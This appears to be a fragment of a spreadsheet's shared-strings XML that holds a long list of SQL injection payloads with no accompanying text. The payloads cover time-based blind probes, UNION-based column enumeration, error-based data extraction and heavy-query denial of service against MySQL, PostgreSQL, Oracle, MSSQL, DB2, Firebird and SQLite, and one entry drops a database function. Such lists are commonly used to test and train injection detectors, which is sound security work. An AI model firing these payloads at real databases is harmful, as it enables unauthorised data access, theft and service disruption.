    <t>1'|| ( select 'scba' where 9079 = 9079 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-5911 union all select 2245,2245,2245,2245,2245,2245#</t>
  </si>
  <si>
    <t>1%" )  and sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'osux' from dual where 7066 = 7066 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1"  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "uzjn" = "uzjn</t>
  </si>
  <si>
    <t>1' )  where 6214 = 6214 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>-8824%'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-4961' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1'|| ( select 'qstz' where 6835 = 6835</t>
  </si>
  <si>
    <t>select case when 2095 = 9074 then 1 else null end--</t>
  </si>
  <si>
    <t>1'  )  )   union all select null--</t>
  </si>
  <si>
    <t>1 )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 5132 = 5132</t>
  </si>
  <si>
    <t>1' where 8864 = 8864</t>
  </si>
  <si>
    <t>-6527'  )  )   union all select 5053,5053,5053,5053--</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>1%' )  union all select null--</t>
  </si>
  <si>
    <t>1" and make_set ( 4214 = 9503,9503 )  and "phjg" like "phjg</t>
  </si>
  <si>
    <t>1 and make_set ( 8403 = 8403,8899 ) -- rbxf</t>
  </si>
  <si>
    <t>1 )  where 9649 = 9649 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%' )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>-1956" )  where 1448 = 1448 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>-9504%"  )  )   or 8098 = 7472</t>
  </si>
  <si>
    <t>1'  )  )   as pdcl where 6964 = 6964</t>
  </si>
  <si>
    <t>1%'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>-3865" )  where 3559 = 3559 union all select 3559,3559,3559,3559,3559,3559,3559--</t>
  </si>
  <si>
    <t>1" where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   )  and 8990 = 4775 and   (  (   ( 1894 = 1894</t>
  </si>
  <si>
    <t>1'+ ( select 'zgtu' where 8419 = 8419</t>
  </si>
  <si>
    <t>1 )  where 5378 = 5378 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-3535%'  )  )   )  or 5605 = 4660 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-1512" union all select 9688,9688,9688,9688,9688,9688,9688,9688,9688,9688--</t>
  </si>
  <si>
    <t>1" )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "ajuh" = "ajuh</t>
  </si>
  <si>
    <t>1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "hbgr" like "hbgr</t>
  </si>
  <si>
    <t>1%' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-8203" )  union all select 6394,6394,6394,6394,6394--</t>
  </si>
  <si>
    <t>-8397'  )  )   )  or 2171 = 4788</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( 'vtoi' like 'vtoi</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 'cfzp' like 'cfzp</t>
  </si>
  <si>
    <t>1' )  where 7541 = 7541</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1303' union all select 4840,4840#</t>
  </si>
  <si>
    <t>select  ( case when  ( 8916 = 1357 )  then 8916 else 8916* ( select 8916 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'zwcp' where 3333 = 3333</t>
  </si>
  <si>
    <t>1"  )  )   as zgig where 5748 = 5748 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  where 6884 = 6884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-5652%' )  union all select 4447,4447,4447,4447,4447,4447,4447,4447,4447--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>1 )  as otsb where 8380 = 8380 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-5810 union all select 6307,6307,6307,6307,6307,6307,6307--</t>
  </si>
  <si>
    <t>-5573' )  union all select 2866,2866,2866,2866,2866,2866,2866,2866,2866--</t>
  </si>
  <si>
    <t>1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 4249 = 4249,7259  )  )  +'</t>
  </si>
  <si>
    <t>1" )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "gcnq" like "gcnq</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>1 )  as mixt where 1085 = 1085 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) </t>
  </si>
  <si>
    <t>1 where 5443 = 5443</t>
  </si>
  <si>
    <t>1' or elt ( 6272 = 6272,sleep ( 5  )  )   and 'fvtf' like 'fvtf</t>
  </si>
  <si>
    <t>1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "bcxh" like "bcxh</t>
  </si>
  <si>
    <t>1" )  where 4038 = 4038 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as yyja where 4321 = 4321 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-4835  )  )   )  or  ( 4219 = 2081 ) *2081 and   (  (   ( 8536 = 8536</t>
  </si>
  <si>
    <t>1" and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "vziz" = "vziz</t>
  </si>
  <si>
    <t xml:space="preserve">1" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>-6722' )  order by 1#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" where 7015 = 7015</t>
  </si>
  <si>
    <t>1%'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-1550%"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1%'  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 'lqwz' = 'lqwz</t>
  </si>
  <si>
    <t>1" and 6637 = 2321</t>
  </si>
  <si>
    <t>1' )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-2247' )  union all select 1202,1202,1202,1202,1202#</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 5025 = 5025</t>
  </si>
  <si>
    <t>1'  )  )   as agdn where 8442 = 8442 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1" )  where 1416 = 1416 union all select null,null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- mkoo</t>
  </si>
  <si>
    <t>1 )  as ryks where 1196 = 1196</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "ejmj" like "ejmj</t>
  </si>
  <si>
    <t>1' )  where 8291 = 8291</t>
  </si>
  <si>
    <t>1'  )  )   and 7230 = 2517</t>
  </si>
  <si>
    <t>1 )  as qwsa where 2874 = 2874</t>
  </si>
  <si>
    <t>1'+ ( select 'jmdl' where 7827 = 7827</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</si>
  <si>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</si>
  <si>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select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) # ujdg</t>
  </si>
  <si>
    <t>1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) # sipo</t>
  </si>
  <si>
    <t>1"  )  )   as paep where 8947 = 8947 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'vtyw' where 7950 = 7950 order by 1--</t>
  </si>
  <si>
    <t>1" and  ( 7424 = 2381 ) *2381 and "dvju" = "dvju</t>
  </si>
  <si>
    <t>1 )  where 1079 = 1079</t>
  </si>
  <si>
    <t>-8163  )  )   as cvai where 2360 = 2360 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) |</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'xugb' from dual where 6772 = 6772</t>
  </si>
  <si>
    <t>1' )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'# opyp</t>
  </si>
  <si>
    <t>1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'xonc' = 'xonc</t>
  </si>
  <si>
    <t>1%" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-5286' or 6783 = 1233</t>
  </si>
  <si>
    <t>1%" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'rguk' where 6019 = 6019 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' and 7533 = 7533 and 'clqy' like 'clqy</t>
  </si>
  <si>
    <t>-6381%"  )  )   )  union all select 1503,1503,1503,1503#</t>
  </si>
  <si>
    <t>-9959" )  where 7073 = 7073 union all select 7073,7073,7073,7073,7073,7073,7073,7073#</t>
  </si>
  <si>
    <t>-5826"  )  )   union all select 7192,7192#</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  'qeet' = 'qeet</t>
  </si>
  <si>
    <t>1'+ ( select 'wpnm' where 8223 = 8223 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  +'</t>
  </si>
  <si>
    <t>1" where 5552 = 5552 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'ndpx' where 4061 = 4061 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1%"  )  )   ) </t>
  </si>
  <si>
    <t>1%'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-6412  )  )   as cnfs where 6557 = 6557 union all select 6557,6557,6557,6557,6557,6557,6557,6557,6557#</t>
  </si>
  <si>
    <t>1%' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-2289" )  or 8624 = 6279 and  ( "ised" = "ised</t>
  </si>
  <si>
    <t>1%' )  and make_set ( 1458 = 3902,3902 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  as nwfz where 7365 = 7365 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1" )  as ubva where 6369 = 6369 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  as jwvp where 5231 = 5231 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-3415 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3955 where 7276 = 7276 union all select 7276,7276,7276,7276,7276,7276,7276,7276,7276--</t>
  </si>
  <si>
    <t>1' )  as ildf where 5545 = 5545 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-5849 )  union all select 6168,6168,6168,6168,6168,6168,6168,6168#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "seci" = "seci</t>
  </si>
  <si>
    <t>-3781 )  union all select 3916,3916,3916--</t>
  </si>
  <si>
    <t>1" )  as rbgl where 3822 = 3822 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1' or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9588'  )  )   union all select 7280,7280,7280,7280,7280,7280,7280,7280,7280,7280--</t>
  </si>
  <si>
    <t>1'  )  )   as zari where 6847 = 6847</t>
  </si>
  <si>
    <t>-8684 union all select 9519,9519,9519,9519--</t>
  </si>
  <si>
    <t>1'|| ( select 'tezo' from dual where 4436 = 4436</t>
  </si>
  <si>
    <t>1%" )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-9197%"  )  )   )  union all select 1040,1040,1040,1040,1040,1040,1040,1040,1040#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and "dwbh" like "dwbh</t>
  </si>
  <si>
    <t>-1083%"  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" )  as dien where 4022 = 4022</t>
  </si>
  <si>
    <t>1 )  where 9167 = 9167</t>
  </si>
  <si>
    <t>1' where 1602 = 1602 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'toft' = 'toft</t>
  </si>
  <si>
    <t>1"  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">begin user_lock.sleep ( 5 ) </t>
  </si>
  <si>
    <t>-9829'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-9327' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'ibdj' = 'ibdj</t>
  </si>
  <si>
    <t>-3620'|| ( select 'kmei' where 8533 = 8533 union all select 8533,8533,8533,8533--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select * from generate_series ( 9108,9108,case when  ( 9108 = 2900 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>1 )  where 2741 = 2741 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-5294%" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "fpwu" like "fpwu</t>
  </si>
  <si>
    <t>1" )  where 9648 = 9648 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  2748 = 2748</t>
  </si>
  <si>
    <t>-4721' )  or elt ( 4378 = 5165,5165 )  and  ( 'fufn' = 'fufn</t>
  </si>
  <si>
    <t>1" order by 1--</t>
  </si>
  <si>
    <t>-8673" )  or make_set ( 9354 = 9354,7185 )  and  ( "edap" like "edap</t>
  </si>
  <si>
    <t>-7412" )  as qngt where 2041 = 2041 union all select 2041--</t>
  </si>
  <si>
    <t>-4157' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-5732' )  union all select 7614,7614,7614,7614--</t>
  </si>
  <si>
    <t>1'  )  )   as fjbe where 4662 = 4662 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  "knbx" = "knbx</t>
  </si>
  <si>
    <t>-7996"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'zoin' = 'zoin</t>
  </si>
  <si>
    <t>-8710 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 where 6119 = 6119 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>if ( 2697 = 2008 )  select 2697 else drop function jcoo--</t>
  </si>
  <si>
    <t>1'+ ( select hvsb where 3666 = 3666</t>
  </si>
  <si>
    <t>1%" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>1%' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  'ytxg' = 'ytxg</t>
  </si>
  <si>
    <t>1' )  where 5286 = 5286</t>
  </si>
  <si>
    <t>1 )  where 4768 = 4768 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'pneh' like 'pneh</t>
  </si>
  <si>
    <t>1"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "sjiz" like "sjiz</t>
  </si>
  <si>
    <t>1' and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 2073 = 5314 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
